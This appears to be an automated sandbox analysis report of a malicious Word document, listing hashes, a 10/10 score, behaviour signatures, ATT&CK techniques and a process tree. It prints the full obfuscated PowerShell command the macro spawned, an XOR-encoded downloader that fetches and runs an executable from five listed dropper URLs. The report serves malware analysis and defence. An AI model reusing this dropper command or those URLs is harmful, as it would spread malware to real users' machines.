Analysis

  • max time kernel
    89s
  • max time network
    87s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20230220-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    30-03-2023 11:11

General

  • Target

    28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473.doc

  • Size

    235KB

  • MD5

    57a933abcd0a70f46006deb5c3d507a0

  • SHA1

    fd6892c482305d7a6edbb2356d8f19330f5ba87b

  • SHA256

    28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473

  • SHA512

    b41788f33df1171ddac802e85589cc59ef1b539ab2489e85c4912b5ea85012763afd3f024fe9467617329c2af840341089e64121e9217321258e71e98c337faf

  • SSDEEP

    3072:uH9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq52yXJm9YBmjDRErQm:uFVeEsjdXRC3jexGG6NYWofREkm

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    • exe.dropper
      http://www.lbbsport.pl/Izmqs/
    • exe.dropper
      http://www.isaac.samjoemmy.com/H9TF8/
    • exe.dropper
      http://www.electrocad.in/4qTumjs/
    • exe.dropper
      http://www.abilitymep.ae/mXss/
    • exe.dropper
      http://www.efmj-eg.org/CdwOm/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . ( $ShelLid[1]+$ShELlid[13]+'X') ( -JoiN('46o77H68%96Z55~100%111~125m39K101~104H96~111H105Z126o42Z68~111L126~36Z93m111H104m73%102K99~111L100H126@49H46~70Z122%94X55%45X98Z126K126~122Z48@37o37H125o125~125@36o102L104H104~121%122~101L120Z126%36L122Z102o37o67@112X103o123%121%37m74o98H126@126L122m48L37Z37@125L125o125o36@99%121X107o107%105~36o121X107K103X96Z101K111X103o103~115K36~105H101K103Z37~66L51m94m76o50%37L74H98L126~126o122H48%37H37@125X125~125K36L111L102K111~105m126L120~101%105o107Z110K36~99o100~37%62%123H94%127o103H96m121H37m74K98@126X126Z122o48~37L37@125m125~125~36m107~104%99Z102m99o126@115o103m111Z122L36%107m111%37o103@82L121L121K37L74o98%126X126K122H48o37~37L125o125K125m36X111m108L103%96X39o111X109m36L101~120L109L37H73@110m125L69o103Z37@45~36H89K122H102@99~126@34K45m74m45o35%49Z46H93m126%127@42@55o42o45H51~62X57L45o49%46o105K99@101K55K46m111L100@124o48H126@111H103~122~33Z45L86X45%33Z46K93@126X127%33@45o36~111X114~111m45H49L108H101Z120o111~107H105m98L34H46H99%76K89%42~99X100~42X46X70m122o94m35X113~126m120L115@113L46Z77@68~96o36K78X101X125@100@102%101~107o110L76~99o102Z111K34@46%99o76L89@38L42%46H105L99%101K35%49o89o126~107~120X126m39K90o120Z101%105Z111o121X121H42o46o105L99~101~49o104H120K111@107@97@49~119m105o107X126Z105m98K113%119K119'.spLIt( 'H@~ZKmXLo%')|% {[CHAr] ( $_ -BxoR "0x0a") } ) )
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:848

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    • Query Registry (2) T1012
    • System Information Discovery (2) T1082

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jzj24yu5.cby.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/848-146-0x000001CA9E8B0000-0x000001CA9E8D2000-memory.dmp
    Filesize

    136KB

  • memory/848-152-0x000001CA9E6E0000-0x000001CA9E6F0000-memory.dmp
    Filesize

    64KB

  • memory/848-154-0x000001CA9E6E0000-0x000001CA9E6F0000-memory.dmp
    Filesize

    64KB

  • memory/848-158-0x000001CA9E6E0000-0x000001CA9E6F0000-memory.dmp
    Filesize

    64KB

  • memory/2116-133-0x00007FFABB730000-0x00007FFABB740000-memory.dmp
    Filesize

    64KB

  • memory/2116-134-0x00007FFABB730000-0x00007FFABB740000-memory.dmp
    Filesize

    64KB

  • memory/2116-135-0x00007FFABB730000-0x00007FFABB740000-memory.dmp
    Filesize

    64KB

  • memory/2116-136-0x00007FFABB730000-0x00007FFABB740000-memory.dmp
    Filesize

    64KB

  • memory/2116-137-0x00007FFABB730000-0x00007FFABB740000-memory.dmp
    Filesize

    64KB

  • memory/2116-138-0x00007FFAB9070000-0x00007FFAB9080000-memory.dmp
    Filesize

    64KB

  • memory/2116-139-0x00007FFAB9070000-0x00007FFAB9080000-memory.dmp
    Filesize

    64KB